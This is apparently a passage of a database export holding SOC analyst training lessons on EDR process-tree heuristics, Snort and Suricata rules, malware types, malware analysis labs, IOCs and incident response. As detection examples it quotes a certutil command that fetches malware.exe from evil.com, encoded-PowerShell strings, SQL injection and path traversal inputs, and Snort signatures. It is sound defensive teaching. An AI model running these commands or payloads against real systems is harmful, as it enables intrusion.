(587, 245, '## Suspicious Parent-Child Relationships (The Cheat Sheet)\n\nMemorize these. These are the \"Bread and Butter\" of Tier 1 Analysis. If you see these, you escalate the ticket.\n\n### 1. The \"Office\" Spawners (Macro Malware)\nAttack Vector: Phishing emails with malicious attachments.\n*   **Parent**: `winword.exe`, `excel.exe`, `powerpnt.exe`, `outlook.exe`\n*   **Suspicious Children**:\n    *   `cmd.exe` (Command Prompt)\n    *   `powershell.exe`\n    *   `wscript.exe` / `cscript.exe` (Script engines)\n    *   `mshta.exe` (HTML Apps)\n    *   `rundll32.exe`\n*   **Verdict**: 99.9% Malicious. Office apps handles documents, not system administration.\n\n### 2. The \"Browser\" Spawners (Drive-By Downloads)\nAttack Vector: User visits a bad site, or is tricked into running a fake \"Update\".\n*   **Parent**: `chrome.exe`, `firefox.exe`, `msedge.exe`\n*   **Suspicious Children**:\n    *   `cmd.exe`, `powershell.exe` (Shells)\n    *   `whoami.exe`, `net.exe`, `ipconfig.exe` (Reconnaissance tools)\n*   **Verdict**: High Risk. Browsers should isolate web content. Spawning a shell means the sandbox was broken or the user was tricked.\n\n### 3. The \"Java/Adobe\" Spawners (Exploits)\nAttack Vector: Exploiting vulnerabilities in old PDF readers or Java runtimes.\n*   **Parent**: `acrord32.exe` (Adobe), `java.exe`, `javaw.exe`\n*   **Suspicious Children**:\n    *   `powershell.exe`\n    *   `cmd.exe`\n*   **Verdict**: Malicious.\n\n### 4. The \"LOLBins\" (Living Off The Land)\nAttackers use built-in Windows tools to hide.\n*   **CertUtil.exe**: Meant for certificates. Used by attackers to download files (like `wget`).\n    *   *Suspicious*: `certutil -urlcache -split -f http://evil.com/malware.exe`\n*   **Rundll32.exe**: Meant to run DLLs.\n    *   *Suspicious*: Loading a DLL from a Temp folder or User Profile.\n\n### 5. Service Exploitation (Web Servers)\nAttack Vector: Webshells / SQL Injection.\n*   **Parent**: `w3wp.exe` (IIS Web Server), `httpd.exe` (Apache), `tomcat.exe`, `sqlservr.exe`\n*   **Suspicious Children**:\n    *   `cmd.exe`\n    *   `whoami.exe`\n    *   `ping.exe`\n*   **Logic**: Your Web Server code (PHP/.NET) executes on the server. If that code spawns a command shell, it means the attacker has injected a command via the website (**Remote Code Execution - RCE**).\n*   **Verdict**: Critical. Server is fully compromised.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(588, 246, '## EDR Market Leaders\n\nJust like SIEM, the EDR market is consolidated around a few major players. You should recognize these names.\n\n### 1. CrowdStrike Falcon\nThe current market leader in enterprise.\n*   **Architecture**: 100% Cloud-native. The sensor on the laptop is extremely lightweight and sends telemetry to the CrowdStrike cloud.\n*   **Features**: Famous for its \"Overwatch\" service (human threat hunters at CrowdStrike who watch your alerts for you).\n*   **UI**: Known for its \"Process Tree\" visualization which set the standard for the industry.\n\n### 2. Microsoft Defender for Endpoint (MDE)\n*   **Advantage**: It is built into Windows 10/11. There is no agent to install; you just flip a switch in the cloud.\n*   **Integration**: Feeds directly into Azure Sentinel (SIEM).\n*   **Capabilities**: went from being a joke (old Windows Defender) to a top-tier Gartner leader. Excellent memory scanning.\n\n### 3. SentinelOne (Singularity)\n*   **Focus**: AI and Automation.\n*   **Feature**: \"Rollback\". If ransomware encrypts your files, SentinelOne can use Windows Shadow Copies to *undo* the encryption and restore the files automatically. This is a huge selling point.\n\n### 4. Carbon Black (VMware/Broadcom)\n*   One of the pioneers of EDR (formerly Bit9).\n*   Very granular control. Often used in high-security environments where you want to whitelist *every single file execution*.\n\n### 5. Cybereason\n*   **Focus**: \"MalOp\" (Malicious Operation). Instead of giving you 50 alerts, it groups them into 1 \"Operation\" to show the full story.\n*   **Visuals**: Very strong visualization of the attack timeline.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(589, 247, '## Module 24 Review\nEDR is your specialized camera for endpoints.\n*   It tracks **Behavior** (Process Trees), not just signatures.\n*   It allows **Live Response** (Shell access, Isolation).\n*   Understanding **Parent-Child relationships** is the #1 skill for EDR analysis.\n\nNext: Intrusion Detection Systems (Network visibility).', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 14:17:57'),
(590, 251, '## Intrusion Detection Systems (IDS): The Burglar Alarm\n\nIf EDR protects the endpoint (the house) and SIEM watches the logs (the diary), the **IDS** watches the wire (the roads leading to the house). It analyzes network packets in real-time to find attacks.\n\n### NIDS vs. HIDS\nThere are two main flavors of IDS:\n\n#### 1. Network IDS (NIDS)\n*   **Location**: Sits on the network, usually behind the firewall or plugged into a Switch Span Port (Mirror Port).\n*   **Visibility**: Sees all traffic flowing through that segment.\n*   **Blind Spot**: It cannot see *encrypted* traffic (HTTPS) unless you are doing SSL Decryption (man-in-the-middle). It also can\'t see what happens inside the host (e.g., USB insertion).\n*   **Examples**: Snort, Suricata, Zeek (Bro).\n\n#### 2. Host IDS (HIDS)\n*   **Location**: Installed on the server/laptop itself (Software Agent).\n*   **Visibility**: Sees file changes, log entries, and memory. Crucially, it sees traffic *after* it has been decrypted by the web server.\n*   **Blind Spot**: If the OS is compromised (Rootkit), the HIDS might be disabled or lied to.\n*   **Examples**: OSSEC, Wazuh Agent (which includes HIDS), Tripwire.\n\n### IDS vs. IPS (Detection vs. Prevention)\n*   **IDS (Intrusion Detection System)**:\n    *   **Mode**: Passive.\n    *   **Action**: \"I see an attack. I will send an alert to the SIEM.\"\n    *   **Traffic**: It receives a *copy* of the traffic (Tap). It does not slow down the network.\n*   **IPS (Intrusion Prevention System)**:\n    *   **Mode**: Inline (Active).\n    *   **Action**: \"I see an attack. I am dropping the packet immediately.\"\n    *   **Traffic**: All traffic flows *through* it. If the IPS crashes, the network goes down (unless you have fail-open hardware).\n\n### Why use IDS if we have Firewalls?\n*   **Firewall**: Blocks based on Rules (IP, Port). \"Allow Port 80.\"\n*   **IDS**: Inspects the *content* of the packet on Port 80. \"Is this request asking for `index.html` (Good) or is it sending `Union Select 1,2,3...` (SQL Injection)?\"\n\nA Firewall is the Bouncer who checks ID. The IDS is the Security Guard watching the dance floor for fights.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(591, 252, '## Detection Methods: Signatures vs. Anomaly\n\nHow does an IDS know a packet is \"bad\"?\n\n### 1. Signature-Based Detection (The Database)\nThis is the traditional method. The IDS compares packets against a huge database of known attack patterns (Signatures).\n*   **Example**: \"If a packet contains the hex bytes `0x90909090` (NOP Sled), alert.\"\n*   **Pros**:\n    *   Low False Positives (Usually).\n    *   Fast.\n    *   Specific (Tells you exactly what the attack is: \"EternalBlue Exploit\").\n*   **Cons**:\n    *   Can only detect *known* attacks.\n    *   Useless against 0-days (Brand new exploits).\n\n### 2. Anomaly-Based Detection (The Baseline)\nAlso called \"Behavioral\". The IDS learns what \"Normal\" traffic looks like.\n*   **Learning Phase**: \"On Mondays, the Marketing Server sends 50MB of data to the Printer.\"\n*   **Detection**: \"Today (Monday), the Marketing Server sent 50GB of data to an IP in China.\" -> ALERT.\n*   **Pros**:\n    *   Can detect 0-days and unknown attacks (because the behavior is weird).\n*   **Cons**:\n    *   **High False Positives**. (Maybe the Marketing team is doing a backup? Maybe they hired a new guy who works weird hours?).\n    *   Requires a \"Training Period\" where the network must be clean (don\'t train on infected traffic!).\n\n### 3. Protocol Verification\nThe IDS knows how protocols (HTTP, DNS, TCP) *should* work.\n*   **Rule**: \"In HTTP, the Header must end with two newlines.\"\n*   **Attack**: An attacker sends a malformed header to crash the server.\n*   **Detection**: The IDS sees the protocol violation and alerts, even without a specific signature for that specific exploit tool.\n\n### The Modern Approach\nMost modern systems use **Hybrid Detection**. They use Signatures for the easy stuff and Anomaly/ML for the complex stuff.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(592, 253, '## Snort: The Grandfather of IDS\n\n**Snort** (created by Sourcefire, now owned by Cisco) is the de-facto standard for NIDS. Even if you use other tools, you will likely use \"Snort Rules\" because the syntax is universal.\n\n### Snort Architecture\n1.  **Packet Decoder**: Prepares packets for inspection.\n2.  **Preprocessors**: Normalizes traffic (e.g., reassembling fragmented TCP packets so attackers can\'t hide payload by splitting it up).\n3.  **Detection Engine**: The core. Matches packets against rules.\n4.  **Logging/Alerting**: Outputs to a file, Syslog, or Database.\n\n### Snort Rule Syntax (Memorize This!)\nA Snort rule has two parts: The **Header** (Action/Protocol/IPs) and the **Options** (What to look for).\n\n`alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:\"Possible SQL Injection\"; content:\"UNION SELECT\"; nocase; sid:1000001; rev:1;)`\n\n*   `alert`: The Action. (Could be `drop`, `log`, `pass`).\n*   `tcp`: The Protocol (udp, icmp, ip).\n*   `$EXTERNAL_NET any`: Source IP and Port.\n*   `->`: Direction (One way).\n*   `$HTTP_SERVERS 80`: Destination IP and Port.\n*   `( ... )`: The Options.\n    *   `msg`: What shows up in the alert log.\n    *   `content`: The specific string to search for in the packet payload (\"UNION SELECT\").\n    *   `nocase`: Ignore Case (Select vs sELecT).\n    *   `sid`: Signature ID (Unique number).\n    *   `rev`: Revision number.\n\n### Writing a Custom Rule\nScenario: You want to detect anyone downloading a file named `confidential_salary.xlsx` via HTTP.\n`alert tcp any any -> any any (msg:\"Sensitive File Access\"; content:\"confidential_salary.xlsx\"; http_uri; sid:1000002;)`\n(Note: `http_uri` tells Snort to look only in the URI part of the packet, making it faster).\n\n### Pros and Cons\n*   **Pros**: Universal, massive community rule sets (Emerging Threats - ET Open).\n*   **Cons**: Single-threaded (historically). On 10Gbps networks, Snort execution can bottleneck one CPU core while others sit idle. (Snort 3.0 fixes this, but adoption is slow).', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(593, 254, '## Suricata: The Multithreaded Powerhouse\n\n**Suricata** (managed by OISF) is the modern competitor to Snort. It uses the same rule syntax (mostly) but was built for speed and deep visibility.\n\n### Key Differences from Snort\n\n#### 1. Multi-Threading\nSuricata is natively multi-threaded. If you put it on a 64-core server, it will use all 64 cores to process traffic. This allows it to handle massive bandwidth (10Gbps, 40Gbps, 100Gbps) that would choke legacy Snort.\n\n#### 2. Protocol Awareness (Application Layer)\nSuricata doesn\'t just look at bytes; it understands the \"App\".\n*   It automatically identifies HTTP, TLS, SMB, FTP, DNS.\n*   Even if you run HTTP on port 8080 (non-standard), Suricata sees the handshake and says \"This is HTTP.\"\n*   **EVE.json**: Suricata produces a rich JSON log file (`eve.json`) that logs metadata for *every* flow, not just alerts.\n    *   *Example*: It logs every TLS certificate exchange. You can investigate \"Self-Signed Certs\" or \"Expired Certs\" effortlessly.\n\n#### 3. File Extraction\nSuricata can automatically carve files out of the stream.\n*   Configuration: `file-store: yes`\n*   Result: If a user downloads a `.exe` or `.pdf`, Suricata can save a copy of that file to disk for the Malware Analysis team to sandbox later.\n\n### Zeek (Formerly Bro)\nWhile talking about Suricata/Snort, we must mention **Zeek**.\n*   **Snort/Suricata** = \"Is this bad?\" (Alerting).\n*   **Zeek** = \"What is happening?\" (Visibility).\nZeek creates transaction logs. `conn.log` (all connections), `http.log` (all web requests), `dns.log` (all resolutions).\nIt is less about signatures and more about generating high-quality structured data for your SIEM to hunt through.\n\n### Which one to choose?\n*   **Snort**: If you need lightweight, standard IPS.\n*   **Suricata**: If you have high bandwidth and want metadata (TLS/HTTP info).\n*   **Zeek**: If you want deep forensics and threat hunting capability (often run *alongside* Suricata).', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(594, 255, '## Analyzing IDS Alerts\n\nAs an Analyst, you will stare at IDS alerts all day. You need to quickly decide: **True Positive** (Real Attack) or **False Positive** (Noise).\n\n### The Analysis Workflow\n\n#### Step 1: Read the Rule (The \"msg\")\n*   Alert: `ET EXPLOIT Obfuscated JavaScript Exploit Kit Landing Page`\n*   Meaning: An external website tried to run a script to exploit the browser.\n\n#### Step 2: Check the Direction\n*   `External -> Internal`: Attack Attempt.\n*   `Internal -> External`: Compromise/Beaconing/Exfiltration. (These are usually scarier).\n\n#### Step 3: Check the Payload (The Packet Capture)\nMost SIEMs/IDS allow you to view the payload that triggered the alert.\n*   **Context**: Did the payload contain readable text?\n    *   Alert says \"SQL Injection\". Payload contains: `user_id=5`. -> **False Positive**. (5 is normal).\n    *   Alert says \"SQL Injection\". Payload contains: `user_id=1 OR 1=1`. -> **True Positive**.\n\n#### Step 4: Check the Response\nDid the server respond?\n*   **Request**: `GET /../../etc/passwd` (Directory Traversal).\n*   **Response**: `404 Not Found`.\n*   **Verdict**: Attempted attack, but **Failed**. (Low Priority).\n*   **Response**: `200 OK` (Followed by root:x:0:0...).\n*   **Verdict**: **Successful Compromise**. (Critical Priority).\n\n### Common False Positives\n1.  **Vulnerability Scanners**: If your creative team runs Nessus/Qualys, your IDS will light up like a Christmas tree. (Whitelist the Scanner IP).\n2.  **P2P Traffic**: Torrent apps often use strange behavior that looks like scanning.\n3.  **Encrypted Traffic**: Sometimes encrypted bytes coincidentally match a text signature. (e.g., a random string inside a JPEG image matches a \"Base64\" signature).\n\n### The \"Default Deny\" Mindset\nWhen investigating, assume it is real until proved otherwise. \"I think this is a False Positive\" is the last words of many fired analysts. Prove it.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(595, 256, '## Module 25 Review\nYou studied:\n*   **NIDS vs HIDS**: Network vs Host.\n*   **Signatures**: The primary method of detection.\n*   **Snort/Suricata**: The tools of the trade.\n*   **Analysis**: Verifying if the alert was a successful attack or just noise.\n\nThis concludes the Detection Engineering section of Path 3.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 14:17:57'),
(596, 261, '## Malware Categories: Know Your Enemy\n\n\"Malware\" is a catch-all term for \"Malicious Software\". However, calling everything a \"Virus\" is like calling every vehicle a \"Car\" (inaccurate when it is a tank or a jet). As an analyst, you must use precise terminology.\n\n### 1. Virus\n*   **Definition**: Code that attaches itself to a legitimate program (host). It cannot run by itself. It needs you to run the host program.\n*   **Behavior**: Replicates by infecting other files.\n*   **Analogy**: A biological virus needs a human cell to reproduce.\n*   **Example**: CIH (Chernobyl), file infectors. *Rare in modern times.*\n\n### 2. Worm\n*   **Definition**: A standalone program that propagates automatically across a network. It does **not** need a host file and does **not** need user interaction.\n*   **Behavior**: Scans the network for vulnerabilities (e.g., SMB exploits), copies itself, and executes.\n*   **Impact**: Can saturate network bandwidth instantly.\n*   **Example**: **WannaCry** (spread via EternalBlue), **Conficker**, **Morris Worm**.\n\n### 3. Trojan Horse\n*   **Definition**: Malware disguised as legitimate software.\n*   **Behavior**: You think you are downloading \"Adobe Photoshop Crack.exe\" or \"Zoom_Installer.exe\". You run it, it installs the app (maybe), but also installs the malware.\n*   **Key**: It relies on **Social Engineering**, not exploits.\n*   **Example**: **Emotet** (often delivered via fake invoices), **Zeus**.\n\n### 4. Ransomware\n*   **Definition**: Malware that encrypts your files and demands payment for the decryption key.\n*   **Behavior**:\n    1.  Infects machine.\n    2.  Contacts C2 server (to generate keys).\n    3.  Encrypts documents (`.docx`, `.jpg`, `.pdf`).\n    4.  Changes wallpaper to \"YOUR FILES ARE ENCRYPTED\".\n*   **Evolution**: Modern Ransomware (Double Extortion) also *steals* your data before encrypting it, threatening to leak it if you don\'t pay.\n*   **Example**: **Ryuk**, **Conti**, **LockBit**.\n\n### 5. Rootkit\n*   **Definition**: Malware designed to hide its existence. It digs deep into the OS (Kernel level).\n*   **Behavior**: It intercepts System Calls.\n    *   You ask Windows: \"Show me all files in C:Windows\".\n    *   Windows asks Kernel.\n    *   Rootkit intercepts: \"List files, but remove \'evil.sys\' from the list.\"\n    *   Windows shows you the list. You see nothing.\n*   **Detection**: Extremely difficult. Usually requires memory forensics.\n\n### 6. Spyware / Keylogger\n*   **Definition**: Steals information.\n*   **Behavior**: Records keystrokes (passwords), takes screenshots, activates the webcam.\n*   **Example**: **Pegasus** (Mobile spyware), **Agent Tesla**.\n\n### 7. Cryptominer (Coinminer)\n*   **Definition**: Steals your CPU/GPU power to mine cryptocurrency (Monero).\n*   **Symptoms**: Computer fans spin at 100%, system becomes sluggish.\n*   **Risk**: It proves the attacker has code execution. Today it\'s a miner; tomorrow it could be Ransomware.\n\n### 8. RAT (Remote Access Trojan)\n*   **Definition**: Logic that gives the attacker full remote control (Screen, Mouse, Shell, Files).\n*   **Behavior**: It\'s like TeamViewer for hackers.\n*   **Example**: **NjRAT**, **DarkComet**.\n\n### Review\n*   If it spreads on its own -> **Worm**.\n*   If it looks like a game but isn\'t -> **Trojan**.\n*   If it locks your files -> **Ransomware**.\n*   If it hides in the kernel -> **Rootkit**.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(597, 262, '## Static vs. Dynamic Analysis: Two Roads to Truth\n\nWhen you find a suspicious file (`invoice.exe`), you have two ways to analyze it.\n\n### 1. Static Analysis (The \"Autopsy\")\nExamining the file **without running it**.\nIt is safe, fast, but can be defeated by obfuscation.\n\n*   **What we look for**:\n    *   **Hashes**: MD5/SHA256. Is this file known to VirusTotal?\n    *   **Strings**: ASCII/Unicode text inside the binary.\n        *   Bad: `cmd.exe`, `Powershell -enc`, `http://evil.com/payload`.\n        *   Good: `Copyright Microsoft Corporation`.\n    *   **Imports (PE Headers)**: What Windows functions does this program use?\n        *   `InternetOpenUrl`: Connects to internet.\n        *   `GetKeyState`: Logs keystrokes?\n        *   `CryptEncrypt`: Ransomware?\n    *   **Packers**: Is the code compressed/obsfuscated (UPX)?\n\n### 2. Dynamic Analysis (The \"Sandbox\")\nRunning the file in a controlled, isolated environment to see **what it does**.\nIt is dangerous (if it escapes) but shows the true behavior.\n\n*   **What we look for**:\n    *   **Process Activity**: Did it spawn `cmd.exe`?\n    *   **File System**: Did it drop a file in `C:Temp`?\n    *   **Registry**: Did it add a Run key for persistence?\n    *   **Network**: Did it DNS query `attacker.com`?\n\n### The Hybrid Workflow\nAlways start with Static.\n1.  **Hash it**: Use `sha256sum`. Check VirusTotal. If it\'s known bad, you are done.\n2.  **Strings it**: Use `strings`. Look for IPs/URLs.\n3.  **PE Analysis**: Use `PEStudio`. Check imports.\n4.  **Sandbox it**: If Static is inconclusive, move to Dynamic. Run it in a VM (Cuckoo/Any.Run) and watch the fireworks.\n\n### Evasion Techniques\n*   **Anti-Static**:\n    *   **Packing**: Compressing the code so \"Strings\" returns garbage. The code only unpacks in memory when run.\n    *   **Obfuscation**: Changing variable names (`var a = 1`) to nonsense (`var x8z9 = 1`).\n*   **Anti-Dynamic**:\n    *   **Sleep**: \"Wait 1 hour before doing anything.\" (Sandboxes usually only run for 5 minutes).\n    *   **User Check**: \" Check if the mouse is moving. If not, I am in a sandbox. Do nothing.\"\n    *   **VM Check**: \"Check hardware ID. If it says \'VMware Virtual Disk\', do nothing.\"', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(598, 263, '## Setting Up a Safe Malware Lab\n\n**WARNING**: NEVER analyze malware on your host machine or your corporate workstation. One mistake and you infect the network. You need a dedicated, isolated lab.\n\n### 1. The Hypervisor\nYou need virtualization software.\n*   **VirtualBox** (Free, Open Source).\n*   **VMware Workstation** (Standard, robust).\n\n### 2. The Network Isolation (Crucial!)\nYou must ensure the malware cannot talk to your home/work network.\n*   **Host-Only Mode**: The VM can talk to the Host (and other VMs) but **cannot** access the Internet or your LAN.\n*   **Custom vNet**: Create a completely isolated virtual switch.\n*   **Fake Internet**: Use a tool like **INetSim**.\n    *   Malware: \"I want to download bad.exe from evil.com\"\n    *   INetSim: \"I am evil.com! Here is your file.\" (Sends a harmless dummy file).\n    *   *Result*: The malware runs, thinking it has internet, but is safely contained.\n\n### 3. The Analysis VMs\nYou don\'t just need a Windows 10 ISO. You need tools.\n*   **FlareVM (Windows)**: A script by Mandiant. You install a clean Windows VM, run the script, and it installs hundreds of tools (x64dbg, PEStudio, Wireshark, Process Hacker).\n*   **REMnux (Linux)**: A Linux distro built for malware analysis (like Kali, but for reverse engineering). It includes tools to analyze PDF/Office docs, decode scripts, and run INetSim.\n\n### 4. Snapshotting\nThis is the superpower of VMs.\n1.  Install Windows.\n2.  Install Tools.\n3.  Disable Windows Defender (so it doesn\'t delete your samples).\n4.  **TAKE A SNAPSHOT** (Name it: \"Clean State\").\n5.  Infect the VM. Watch it die.\n6.  **Revert to Snapshot**.\n7.  In 10 seconds, you are back to a clean state, ready for the next sample.\n\n### Lab Safety Rules\n1.  **Disconnect**: Verify network adapter is \"Host-Only\" or \"Custom\".\n2.  **No Sharing**: Disable \"Shared Folders\" between Host and Guest.\n3.  **No USB**: Do not plug USB drives into the VM.\n4.  **VPN**: If you must analyze \"live\" (letting it connect to internet), use a VPN and a \"Burner\" network separate from your company Wi-Fi.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(599, 264, '## Static Analysis Tools: The Surgeon\'s Kit\n\nHere are the essential tools you will use during Static Analysis. Most are free.\n\n### 1. VirusTotal (The First Stop)\n*   **What it is**: A website that scans your file with 70+ Antivirus engines.\n*   **Usage**: Upload hash.\n*   **Verdict**:\n    *   50/70 red: Definitely Malware.\n    *   0/70 green: Clean... OR a brand new Zero-Day.\n    *   **Community Tab**: Read comments. Other analysts often post \"This is Emotet dropped via phishing.\"\n\n### 2. Strings\n*   **Command**: `strings file.exe` (Linux) or `strings.exe` (Windows Sysinternals).\n*   **Function**: Extracts printable characters.\n*   **What to hunt**:\n    *   IP Addresses (`1.2.3.4`).\n    *   URLs (`http://...`).\n    *   Filenames (`dropped_malware.exe`).\n    *   Registry Keys (`SoftwareMicrosoftWindowsCurrentVersionRun`).\n    *   Error messages (often reveal the compiler/language).\n\n### 3. PEStudio (Windows)\n*   **Function**: Deep inspection of the Portable Executable (PE) header.\n*   **Key Features**:\n    *   **Indicators**: Highlights suspicious things in red (e.g., \"File has no digital signature\", \"File references a browser\").\n    *   **Imports**: Shows what DLLs/APIs are used.\n    *   **Resources**: Sometimes malware hides a second .exe inside its \"Icon\" or \"Image\" resource section.\n\n### 4. Capa (Mandiant)\n*   **Function**: \"What does this do?\" using rules.\n*   **Output**: Instead of showing you assembly code, it says:\n    *   \"Capability: Encrypts Data using AES\"\n    *   \"Capability: Connects to HTTP\"\n    *   \"Capability: Takes Screenshot\"\n*   It\'s like Google Translate for Assembly code.\n\n### 5. PEiD / Detect It Easy (DiE)\n*   **Function**: Detects **Packers**.\n*   **Scenario**: You run `strings` and see random garbage.\n*   **DiE says**: \"Packed with UPX\".\n*   **Action**: You know you must unpack it (using `upx -d` or manual unpacking) before you can analyze it.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(600, 265, '## Dynamic Analysis (Sandboxing)\n\nWhen Static Analysis hits a wall (obfuscation), we detonate the bomb in a box.\n\n### 1. Automated Sandboxes (Cuckoo / Cuckoo-Modified)\n*   **Concept**: You submit a file. The system spins up a VM, runs the file, records everything for 5 minutes, kills the VM, and gives you a report.\n*   **The Report**:\n    *   **Screenshots**: Did it pop up a Ransomware note?\n    *   **Network**: PCAPs of traffic.\n    *   **Dropped Files**: Copies of any files it created.\n    *   **API Calls**: Every interaction with Windows.\n\n### 2. Interactive Analysis (Any.Run)\n*   **Concept**: A web-based sandbox where *you* interact with the VM.\n*   **Scenario**: The malware is a Word Doc that says \"Click Enable Content\".\n    *   In Cuckoo, no one clicks it, so nothing happens.\n    *   In Any.Run, you watch the screen, you click \"Enable Content\", and BAM, the malware runs. You see the process tree explode in real-time.\n*   **Pros**: instant visibility, handles user-interaction triggers.\n\n### 3. Monitoring Tools (Manual Sandbox)\nIf you are running the malware in your own FlareVM:\n*   **Process Hacker**: Task Manager on steroids. Shows parent-child trees, memory strings, and coloring for packed processes.\n*   **Procmon (Process Monitor)**: The holy grail. Records *every* File System, Registry, and Process event.\n    *   *Tip*: It generates millions of events. Filter is your friend. `ProcessName is evil.exe`.\n*   **Regshot**:\n    1.  Take \"Shot 1\" (Registry before malware).\n    2.  Run Malware.\n    3.  Take \"Shot 2\".\n    4.  Compare. It shows you exactly what registry keys were added (Persistence).\n*   **Fiddler / Wireshark**: Capture the network traffic. Fiddler is great for decrypting HTTPs if you install its root cert.\n\n### Indicators of Compromise (IOCs)\nThe goal of Dynamic analysis is to extract IOCs to put into your SIEM/EDR.\n*   **Network IOCs**: C2 IPs, Domains, URLs to block.\n*   **Host IOCs**: File Hashes, Mutex names, Registry keys, Filenames.\n*   **Behavioral IOCs**: \"Powershell.exe connecting to the internet\".', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(601, 266, '## Identifying IOCs from Malware\n\nYou\'ve analyzed the malware. You have pages of notes. Now, what do you do? You need to extract **Actionable Intelligence**.\n\n### The Pyramid of Pain\nNot all IOCs are equal. David Bianco\'s \"Pyramid of Pain\" describes how hard it is for an attacker to change their IOCs vs how hard it is for you to detect them.\n\n#### 1. Hash Values (Bottom - Trivial)\n*   **What**: MD5/SHA256 of the file.\n*   **Attacker Effort**: Trivial. Change 1 byte, hash changes.\n*   **Value**: Low. Only catches that *one* specific file.\n\n#### 2. IP Addresses (Easy)\n*   **What**: C2 Server IP.\n*   **Attacker Effort**: Easy. Change IP using a Proxy/VPN.\n*   **Value**: Low/Medium. IPs serve many domains.\n\n#### 3. Domain Names (Simple)\n*   **What**: `evil.com`.\n*   **Attacker Effort**: Simple. Register a new domain (`evil2.com`).\n*   **Value**: Medium. Requires money/time for attacker.\n\n#### 4. Network/Host Artifacts (Annoying)\n*   **What**: User-Agent strings, specific registry keys, distinctive filename patterns.\n*   **Attacker Effort**: Annoying. Tthey have to rewrite their code config.\n*   **Value**: High. Catches the *tool*.\n\n#### 5. Tools (Challenging)\n*   **What**: Detecting the tool itself (e.g., Cobalt Strike beacon) regardless of config.\n*   **Attacker Effort**: Challenging. They have to write a new tool from scratch.\n\n#### 6. TTPs (Top - Tough)\n*   **What**: Tactics, Techniques, and Procedures. (Behavior).\n*   **Example**: \"Pass-the-Hash\", \"Spearphishing with Macros\".\n*   **Attacker Effort**: Tough. They have to learn a whole new way of hacking.\n*   **Value**: **Highest**. If you detect \"Pass-the-Hash\", you catch them no matter what tool they use.\n\n### Creating the Report\nYour Malware Analysis Report should contain:\n1.  **Executive Summary**: \"This is ransomware. It spreads via SMB. Risk is Critical.\"\n2.  **Technical Details**:\n    *   Packer used.\n    *   Compilation timestamp.\n    *   Capabilities.\n3.  **IOC List (The \"Blocklist\")**:\n    *   `Hash: e3b0c442...`\n    *   `Domain: update-microsoft-support.com`\n    *   `IP: 192.0.2.1`\n    *   `File: C:WindowsTempwinlogon_update.exe`\n4.  **YARA Rules**: A way to describe the malware pattern to hunt for it across the organization.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(602, 267, '## Module 26 Review\nYou learned:\n1.  **Malware Types**: Ransomware vs RAT vs Worm.\n2.  **Static**: Reading strings and hashes.\n3.  **Dynamic**: Detonating in a sandbox.\n4.  **IOCs**: The output of your analysis used to protect the network.\n\nNext: How to handle the incident when the malware detection fires (Incident Response).', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 14:19:16'),
(603, 271, '## What is Incident Response?\n\n**Incident Response (IR)** is the structured approach to addressing and managing the aftermath of a security breach or cyberattack. The goal is to handle the situation in a way that limits damage and reduces recovery time and costs.\n\n### Incident vs. Event\n*   **Event**: Any observable occurrence in a system.\n    *   *Example*: User login, firewall deny, file creation.\n    *   *Count*: Millions per day.\n*   **Alert**: An event that triggers a warning based on a rule.\n    *   *Example*: 10 Failed logins.\n*   **Incident**: A violation of security policies that threatens CIA (Confidentiality, Integrity, Availability).\n    *   *Example*: Data breach, Malware infection, Denial of Service.\n    *   *Count*: Hopefully rare.\n\n### Why do we need a Process?\nWhen a breach happens, panic sets in.\n*   \"Pull the plug!\"\n*   \"Wipe the server!\"\n*   \"Call the police!\"\n*   \"Don\'t tell anyone!\"\nWithout a plan, people make mistakes. They destroy evidence (rebooting wipes memory). They tip off the attacker. They violate legal requirements.\nIR is about **Organized Chaos Control**.\n\n### The Computer Security Incident Response Team (CSIRT)\nThe team responsible for IR.\n*   **Technical**: SOC Analysts, Forensics Experts, Malware Engineers.\n*   **Non-Technical**:\n    *   **Legal**: \"Do we have to notify the government? The customers?\"\n    *   **PR/Comms**: \"What do we tell the press?\"\n    *   **HR**: \"Was it an insider? Do we fire them?\"\n    *   **Management**: Approves decisions (e.g., \"Shut down the ecommerce site\").\n\n### The Goal of IR\n1.  **Contain**: Stop the bleeding.\n2.  **Eradicate**: Remove the infection.\n3.  **Recover**: Get back to business.\n4.  **Learn**: Don\'t let it happen again.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(604, 272, '## The IR Lifecycle (NIST 800-61)\n\nThe Bible of Incident Response is **NIST Special Publication 800-61r2**. It defines the four phases of the lifecycle.\n\n### 1. Preparation\nThis happens *before* the attack.\n*   **Action**: Establishing the CSIRT, buying tools, writing playbooks, setting up communication channels.\n*   **Key**: If you aren\'t prepared, you have already failed.\n\n### 2. Detection & Analysis\nThis is where the SOC lives.\n*   **Action**: Monitoring the SIEM, triaging alerts, determining if it is a False Positive or a Real Incident.\n*   **Key**: Determining the **Scope**. Is it 1 laptop? Or the entire Domain?\n\n### 3. Containment, Eradication, & Recovery\nThe \"Fix it\" phase.\n*   **Containment**: Stop the spread. (Isolation).\n*   **Eradication**: Remove the threat (Delete malware, disable accounts).\n*   **Recovery**: Restore data from backups, patch vulnerabilities, return to normal.\n\n### 4. Post-Incident Activity (Lessons Learned)\nThe most important, yet most ignored phase.\n*   **Action**: A meeting 2 weeks later. \"What went wrong? Why didn\'t we catch it sooner? How do we improve?\"\n*   **Output**: New SIEM rules, new Playbooks, better tools.\n\n### The Feedback Loop\nIt is a 